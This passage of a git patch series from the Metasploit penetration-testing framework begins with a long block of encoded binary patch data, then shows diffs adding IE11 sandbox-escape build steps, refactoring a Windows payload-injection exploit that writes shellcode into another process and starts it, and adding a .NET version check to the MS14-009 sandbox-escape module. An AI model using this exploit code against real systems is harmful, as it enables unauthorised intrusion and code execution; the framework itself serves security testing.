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 diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll index adbfff46ad544a8107f490492559ee6719c38db0..0958c1e931418c2d6c1397834cd78e3424366043 100755 GIT binary patch delta 42 wcmZqJz|*jSX8|MghJPKCnHhbV(w{d6F}4RWGHwrIWLk6)B)<LoB_>W+09~mNzyJUM delta 42 wcmZqJz|*jSX8|L#gJ!~HW=3BoGn?ih#`Yja#_d6jOp7jp#J7LH#Kh?e01rS73IG5A diff --git a/data/meterpreter/screenshot.x86.dll b/data/meterpreter/screenshot.x86.dll index eb9264e336e1d3efcfbd9ef6bad3163744f9973f..93bf2e177823e083281c34b21c67c1ae336b29a4 100755 GIT binary patch delta 43 xcmZqJz|*jSX8|K~(!Y+$%#6Ow(^y!VgBja{85y?+Gcrwl4wBgZ`~{PwJ^)9Y4}Aat delta 43 xcmZqJz|*jSX8|K~r$)kLW=3D;$q~%W!Hn&}jEviZ8JQ+N2T5#y{(?zT9{??x4j%vj diff --git a/external/source/exploits/IE11SandboxEscapes/make.msbuild b/external/source/exploits/IE11SandboxEscapes/make.msbuild new file mode 100755 index 0000000000..e2ca621d10 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/make.msbuild @@ -0,0 +1,18 @@ +<?xml version="1.0" standalone="yes"?> +<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <PropertyGroup> + <SolutionPath>.\IE11SandboxEscapes.sln</SolutionPath> + </PropertyGroup> + + <Target Name="all" DependsOnTargets="x86" /> + + <Target Name="x86"> + <Message Text="Building IE11SandboxEscapes x86 Release version" /> + <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/> + </Target> + + <Target Name="x64"> + <Message Text="IE11SandboxEscapes not supported in x64" /> + </Target> +</Project> + diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat index 38caa762c4..a66e6017bd 100755 --- a/external/source/exploits/make.bat +++ b/external/source/exploits/make.bat @@ -59,6 +59,7 @@ IF "%ERRORLEVEL%"=="0" ( PUSHD bypassuac msbuild.exe make.msbuild /target:%PLAT% POPD + ) IF "%ERRORLEVEL%"=="0" ( @@ -68,6 +69,15 @@ IF "%ERRORLEVEL%"=="0" ( POPD ) +) + +IF "%ERRORLEVEL%"=="0" ( + ECHO "Building IE11 Sandbox bypasses" + PUSHD IE11SandboxEscapes + msbuild.exe make.msbuild /target:%PLAT% + POPD +) + FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6% echo Finished %ldt% From 03b4a29662a1b181acb27ab0b708fe7ac0913fe8 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer <FireFart@gmail.com> Date: Sat, 31 May 2014 22:17:32 +0200 Subject: [PATCH 440/853] Clarify filedropper error message --- lib/msf/core/exploit/file_dropper.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb index 8ce6cf1a83..8020bf7533 100644 --- a/lib/msf/core/exploit/file_dropper.rb +++ b/lib/msf/core/exploit/file_dropper.rb @@ -122,7 +122,7 @@ module Exploit::FileDropper end @dropped_files.each do |f| - print_warning("This exploit may require manual cleanup of: #{f}") + print_warning("This exploit may require manual cleanup on the target of: #{f}") end end From a4ecd8e02de02085ac8d63b036953c18976e9c56 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Sun, 1 Jun 2014 11:49:56 +0100 Subject: [PATCH 441/853] Should return the thread object --- lib/msf/core/post/windows/process.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/msf/core/post/windows/process.rb b/lib/msf/core/post/windows/process.rb index 2509e9de44..f140e3e669 100644 --- a/lib/msf/core/post/windows/process.rb +++ b/lib/msf/core/post/windows/process.rb @@ -35,10 +35,9 @@ module Process thread = host.thread.create(shell_addr,0) unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread) vprint_error("Unable to create thread") - return false end - true + thread end end # Process From 4801a7fca00e601adefcbdbd6ee18c1fd0920291 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Sun, 1 Jun 2014 11:50:13 +0100 Subject: [PATCH 442/853] Allow x86->x64 injection --- .../exploits/windows/local/payload_inject.rb | 35 +++---------------- 1 file changed, 5 insertions(+), 30 deletions(-) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 0b7a26f357..069994534a 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -10,6 +10,8 @@ require 'msf/core/exploit/exe' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking + include Msf::Core::Post::Windows::Process + def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage Memory Payload Injection', @@ -52,13 +54,7 @@ class Metasploit3 < Msf::Exploit::Local return end - if @payload_arch.first =~ /64/ and client.platform =~ /x86/ - print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.") - print_error("Migrate to an x64 process and try again.") - return false - else - inject_into_pid(pid) - end + inject_into_pid(pid) end # Figures out which PID to inject to @@ -83,8 +79,6 @@ class Metasploit3 < Msf::Exploit::Local return false end - pids = [] - procs.each do |p| found_pid = p['pid'] return true if found_pid == pid @@ -144,27 +138,8 @@ class Metasploit3 < Msf::Exploit::Local begin print_status("Preparing '#{@payload_name}' for PID #{pid}") - raw = payload.generate - - print_status("Opening process #{pid.to_s}") - host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) - if not host_process - print_error("Unable to open #{pid.to_s}") - return - end - - print_status("Allocating memory in procees #{pid}") - mem = host_process.memory.allocate(raw.length + (raw.length % 1024)) - - # Ensure memory is set for execution - host_process.memory.protect(mem) - - print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager") - print_status("Writing the stager into memory...") - host_process.memory.write(mem, raw) - host_process.thread.create(mem, 0) - print_good("Successfully injected payload in to process: #{pid}") - + raw = payload.encoded + execute_shellcode(raw, nil, pid) rescue Rex::Post::Meterpreter::RequestError => e print_error("Unable to inject payload:") print_line(e.to_s) From 3c5fae370614431cb818611b4cabc9bc15e2bcae Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Sun, 1 Jun 2014 11:51:06 +0100 Subject: [PATCH 443/853] Use correct include --- modules/exploits/windows/local/payload_inject.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 069994534a..76506a500e 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -10,7 +10,7 @@ require 'msf/core/exploit/exe' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking - include Msf::Core::Post::Windows::Process + include Msf::Post::Windows::Process def initialize(info={}) super( update_info( info, From f0e9a9010ed96d527a7c2312f56372c846445b78 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Sun, 1 Jun 2014 11:55:40 +0100 Subject: [PATCH 444/853] Return nil if fail --- lib/msf/core/post/windows/process.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/core/post/windows/process.rb b/lib/msf/core/post/windows/process.rb index f140e3e669..53a4e1e3f3 100644 --- a/lib/msf/core/post/windows/process.rb +++ b/lib/msf/core/post/windows/process.rb @@ -35,6 +35,7 @@ module Process thread = host.thread.create(shell_addr,0) unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread) vprint_error("Unable to create thread") + nil end thread From 8346e20bf14a37c7622dd4afe4efc72a2a912c6a Mon Sep 17 00:00:00 2001 From: OJ <oj@buffered.io> Date: Sun, 1 Jun 2014 21:27:07 +1000 Subject: [PATCH 445/853] Change memory types from DWORD to QWORD This was causing memory allocations to fail on x64 in cases where the higher bits were set in addresses. --- lib/rex/post/meterpreter/extensions/stdapi/tlv.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb index a20b0b1993..b56f22a102 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb @@ -125,12 +125,12 @@ TLV_TYPE_ENV_GROUP = TLV_META_TYPE_GROUP | 1102 DELETE_KEY_FLAG_RECURSIVE = (1 << 0) # Process -TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000 +TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_QWORD | 2000 TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001 TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002 TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003 TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004 -TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005 +TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_QWORD | 2005 TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006 TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007 TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008 From 31af8ef07b99f4a82c62a69609ba5e242f9802af Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Sun, 1 Jun 2014 20:58:08 -0500 Subject: [PATCH 446/853] Check .NET version --- .../windows/local/ms14_009_ie_dfsvc.rb | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index aebb4529cd..5d705751d5 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -15,8 +15,20 @@ class Metasploit3 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer include Msf::Post::Windows::Priv + include Msf::Post::Windows::FileInfo include Msf::Post::File + NET_VERSIONS = { + '4.5' => { + 'dfsvc' => '4.0.30319.17929.17', + 'mscorlib' => '4.0.30319.18063.18' + }, + '4.5.1' => { + 'dfsvc' => '4.0.30319.18408.18', + 'mscorlib' => '4.0.30319.18444.18' + } + } + def initialize(info={}) super( update_info( info, 'Name' => 'MS14-009 .NET Deployment Service IE Sandbox Escape', @@ -69,10 +81,44 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::NotVulnerable, "Not running at Low Integrity") end + print_status("Searching .NET Deployment Service (dfsvc.exe)...") + unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found") end + dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") + dfsvc_version = dfsvc_version.join(".") + + net_version = "" + + NET_VERSIONS.each do |k,v| + if v["dfsvc"] == dfsvc_version + net_version = k + end + end + + if net_version.empty? + fail_with(Failure::NotVulnerable, "This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1") + end + + print_good(".NET Deployment Service from .NET #{net_version} found.") + + print_status("Checking if .NET is patched...") + + unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") + fail_with(Failure::NotVulnerable, ".NET Installation can not be verified (mscorlib.dll not found)") + end + + mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") + mscorlib_version = mscorlib_version.join(".") + + unless mscorlib_version < NET_VERSIONS[net_version]["mscorlib"] + fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable") + end + + print_good(".NET looks vulnerable, exploiting...") + begin Timeout.timeout(datastore['DELAY']) { super } rescue Timeout::Error From 